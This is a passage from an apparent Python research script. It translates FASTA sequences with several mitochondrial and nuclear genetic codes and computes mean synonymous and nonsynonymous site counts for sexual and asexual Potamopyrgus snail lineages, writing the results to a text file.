'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG']
seqDict,seqList = buildSeqDict(fasta)
codonDict = {}
AADict = {}
for seq in seqList:
nucleotideSeq = seqDict[seq]
codonList = []
i = 2
while i < len(nucleotideSeq):
currCodon = nucleotideSeq[i-2] + nucleotideSeq[i-1] + nucleotideSeq[i]
codonList.append(currCodon)
i += 3
codonDict[seq] = codonList
AAseq = ''
codonNum = 1
for codon in codonList:
if codonNum == 1 and 'N' not in codon and '-' not in codon:
if codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
elif 'N' not in codon and '-' not in codon:
aa = geneticCode[codon]
else:
aa = 'X'
AAseq += aa
codonNum += 1
if AAseq[-1] == '*':
AAseq = AAseq[0:-1]
AADict[seq] = AAseq
return seqDict, seqList, codonDict
def buildSeqDict(fasta):
infile = open(fasta,'r')
scaffoldDict = {}
scaffoldList = []
seqName = ''
currSeq = ''
for line in infile:
if line[0] == '>':
if seqName != '':
scaffoldDict[seqName] = currSeq
seqName = line
while seqName[-1] == '\n' or seqName[-1] == '\t' or seqName[-1] == '\r':
seqName = seqName[0:-1]
scaffoldList.append(seqName)
currSeq = ''
else:
currSeq += line
while currSeq[-1] == '\n' or currSeq[-1] == '\t' or currSeq[-1] == '\r':
currSeq = currSeq[0:-1]
scaffoldDict[seqName] = currSeq
return scaffoldDict, scaffoldList
def meanSites(fasta):
asexList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n']
sexList = ['>$*Kaniere_1_2n','>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$*Yellow_Contig_56','>$*Alexsex','>$*AlexMap','>$*Lady','>$*Ianthe','>$*Rotoroa_1_2n']
antipodarumList = ['>$Duluth','>$Heron2','>$McGregor','>$Waik36','>$WalesC','>$clone_1','>$AC51','>$Heron_mitochondrion','>$clone_7','>$Waik37','>$Gunn','>$DenmarkA','>$Waik372','>$Tarawera','>$Poerua_triploid','>$Kaniere_triploid','>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237','>$Brunner_2_4n','>$Brunner_6_3n','>$Grasmere_1_4n','>$Grasmere_6_3n','>$Poerua_72_4n','>$Rotoiti_1_4n','>$*Kaniere_1_2n','>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309','>$*Yellow_Contig_56','>$*Alexsex','>$*AlexMap','>$*Lady','>$*Ianthe','>$*Rotoroa_1_2n']
seqDict, seqList, codonDict = buildCodonDict(fasta)
sexS = 0
sexN = 0
sexC1 = 0
sexR1 = 0
sexC2 = 0
sexR2 = 0
sexC3 = 0
sexR3 = 0
sexC4 = 0
sexR4 = 0
sexC5 = 0
sexR5 = 0
sexC6 = 0
sexR6 = 0
sexC7 = 0
sexR7 = 0
asexS = 0
asexN = 0
asexC1 = 0
asexR1 = 0
asexC2 = 0
asexR2 = 0
asexC3 = 0
asexR3 = 0
asexC4 = 0
asexR4 = 0
asexC5 = 0
asexR5 = 0
asexC6 = 0
asexR6 = 0
asexC7 = 0
asexR7 = 0
S = 0
N = 0
C1 = 0
R1 = 0
C2 = 0
R2 = 0
C3 = 0
R3 = 0
C4 = 0
R4 = 0
C5 = 0
R5 = 0
C6 = 0
R6 = 0
C7 = 0
R7 = 0
est = countSites(codonDict['>Potamopyrgus_estuarinus'])
estS = est[0]
estN = est[1]
estC1 = est[2]
estR1 = est[3]
estC2 = est[4]
estR2 = est[5]
estC3 = est[6]
estR3 = est[7]
estC4 = est[8]
estR4 = est[9]
estC5 = est[10]
estR5 = est[11]
estC6 = est[12]
estR6 = est[13]
estC7 = est[14]
estR7 = est[15]
outfile = open('sites.txt','w')
for snail in antipodarumList:
snailSites = countSites(codonDict[snail])
S += snailSites[0]
N += snailSites[1]
R1 += snailSites[2]
C1 += snailSites[3]
R2 += snailSites[4]
C2 += snailSites[5]
R3 += snailSites[6]
C3 += snailSites[7]
R4 += snailSites[8]
C4 += snailSites[9]
R5 += snailSites[10]
C5 += snailSites[11]
R6 += snailSites[12]
C6 += snailSites[13]
R7 += snailSites[14]
C7 += snailSites[15]
if snail in sexList:
sexS += snailSites[0]
sexN += snailSites[1]
sexR1 += snailSites[2]
sexC1 += snailSites[3]
sexR2 += snailSites[4]
sexC2 += snailSites[5]
sexR3 += snailSites[6]
sexC3 += snailSites[7]
sexR4 += snailSites[8]
sexC4 += snailSites[9]
sexR5 += snailSites[10]
sexC5 += snailSites[11]
sexR6 += snailSites[12]
sexC6 += snailSites[13]
sexR7 += snailSites[14]
sexC7 += snailSites[15]
elif snail in asexList:
asexS += snailSites[0]
asexN += snailSites[1]
asexR1 += snailSites[2]
asexC1 += snailSites[3]
asexR2 += snailSites[4]
asexC2 += snailSites[5]
asexR3 += snailSites[6]
asexC3 += snailSites[7]
asexR4 += snailSites[8]
asexC4 += snailSites[9]
asexR5 += snailSites[10]
asexC5 += snailSites[11]
asexR6 += snailSites[12]
asexC6 += snailSites[13]
asexR7 += snailSites[14]
asexC7 += snailSites[15]
sexS /= len(sexList)
sexN /= len(sexList)
sexC1 /= len(sexList)
sexR1 /= len(sexList)
sexC2 /= len(sexList)
sexR2 /= len(sexList)
sexC3 /= len(sexList)
sexR3 /= len(sexList)
sexC4 /= len(sexList)
sexR4 /= len(sexList)
sexC5 /= len(sexList)
sexR5 /= len(sexList)
sexC6 /= len(sexList)
sexR6 /= len(sexList)
sexC7 /= len(sexList)
sexR7 /= len(sexList)
asexS /= len(asexList)
asexN /= len(asexList)
asexC1 /= len(asexList)
asexR1 /= len(asexList)
asexC2 /= len(asexList)
asexR2 /= len(asexList)
asexC3 /= len(asexList)
asexR3 /= len(asexList)
asexC4 /= len(asexList)
asexR4 /= len(asexList)
asexC5 /= len(asexList)
asexR5 /= len(asexList)
asexC6 /= len(asexList)
asexR6 /= len(asexList)
asexC7 /= len(asexList)
asexR7 /= len(asexList)
divS = (S + estS)/(len(antipodarumList) + 1)
divN = (N + estN)/(len(antipodarumList) + 1)
divC1 = (C1 + estC1)/(len(antipodarumList) + 1)
divR1 = (R1 + estR1)/(len(antipodarumList) + 1)
divC2 = (C2 + estC2)/(len(antipodarumList) + 1)
divR2 = (R2 + estR2)/(len(antipodarumList) + 1)
divC3 = (C3 + estC3)/(len(antipodarumList) + 1)
divR3 = (R3 + estR3)/(len(antipodarumList) + 1)
divC4 = (C4 + estC4)/(len(antipodarumList) + 1)
divR4 = (R4 + estR4)/(len(antipodarumList) + 1)
divC5 = (C5 + estC5)/(len(antipodarumList) + 1)
divR5 = (R5 + estR5)/(len(antipodarumList) + 1)
divC6 = (C6 + estC6)/(len(antipodarumList) + 1)
divR6 = (R6 + estR6)/(len(antipodarumList) + 1)
divC7 = (C7 + estC7)/(len(antipodarumList) + 1)
divR7 = (R7 + estR7)/(len(antipodarumList) + 1)
S /= len(antipodarumList)
N /= len(antipodarumList)
C1 /= len(antipodarumList)
R1 /= len(antipodarumList)
C2 /= len(antipodarumList)
R2 /= len(antipodarumList)
C3 /= len(antipodarumList)
R3 /= len(antipodarumList)
C4 /= len(antipodarumList)
R4 /= len(antipodarumList)
C5 /= len(antipodarumList)
R5 /= len(antipodarumList)
C6 /= len(antipodarumList)
R6 /= len(antipodarumList)
C7 /= len(antipodarumList)
R7 /= len(antipodarumList)
meanC = (C1 + C2 + C3 + C4 + C5 + C6 + C7)/7
meanR = (R1 + R2 + R3 + R4 + R5 + R6 + R7)/7
meanDivC = (divC1 + divC2 + divC3 + divC4 + divC5 + divC6 + divC7)/7
meanDivR = (divR1 + divR2 + divR3 + divR4 + divR5 + divR6 + divR7)/7
meanSexC = (sexC1 + sexC2 + sexC3 + sexC4 + sexC5 + sexC6 + sexC7)/7
meanSexR = (sexR1 + sexR2 + sexR3 + sexR4 + sexR5 + sexR6 + sexR7)/7
meanAsexC = (asexC1 + asexC2 + asexC3 + asexC4 + asexC5 + asexC6 + asexC7)/7
meanAsexR = (asexR1 + asexR2 + asexR3 + asexR4 + asexR5 + asexR6 + asexR7)/7
outfile.write('Group\tS\tN\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5\tC6\tR6\tC7\tR7\tmeanC\tmeanR\nP.antipodarum-P.estuarinus\t' + str(divS) + '\t' + str(divN) + '\t' + str(divC1) + '\t' + str(divR1) + '\t' + str(divC2) + '\t' + str(divR2) + '\t' + str(divC3) + '\t' + str(divR3) + '\t' + str(divC4) + '\t' + str(divR4) + '\t' + str(divC5) + '\t' + str(divR5) + '\t' + str(divC6) + '\t' + str(divR6) + '\t' + str(divC7) + '\t' + str(divR7) + '\t' + str(meanDivC) + '\t' + str(meanDivR) + '\nP.antipodarum\t' + str(S) + '\t' + str(N) + '\t' + str(C1) + '\t' + str(R1) + '\t' + str(C2) + '\t' + str(R2) + '\t' + str(C3) + '\t' + str(R3) + '\t' + str(C4) + '\t' + str(R4) + '\t' + str(C5) + '\t' + str(R5) + '\t' + str(C6) + '\t' + str(R6) + '\t' + str(C7) + '\t' + str(R7) + '\t' + str(meanC) + '\t' + str(meanR) + '\nSex\t' + str(sexS) + '\t' + str(sexN) + '\t' + str(sexC1) + '\t' + str(sexR1) + '\t' + str(sexC2) + '\t' + str(sexR2) + '\t' + str(sexC3) + '\t' + str(sexR3) + '\t' + str(sexC4) + '\t' + str(sexR4) + '\t' + str(sexC5) + '\t' + str(sexR5) + '\t' + str(sexC6) + '\t' + str(sexR6) + '\t' + str(sexC7) + '\t' + str(sexR7) + '\t' + str(meanSexC) + '\t' + str(meanSexR) + '\nAsex\t' + str(asexS) + '\t' + str(asexN) + '\t' + str(asexC1) + '\t' + str(asexR1) + '\t' + str(asexC2) + '\t' + str(asexR2) + '\t' + str(asexC3) + '\t' + str(asexR3) + '\t' + str(asexC4) + '\t' + str(asexR4) + '\t' + str(asexC5) + '\t' + str(asexR5) + '\t' + str(asexC6) + '\t' + str(asexR6) + '\t' + str(asexC7) + '\t' + str(asexR7) + '\t' + str(meanAsexC) + '\t' + str(meanAsexR) + '\n')
outfile.close()
def countSites(codonList):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 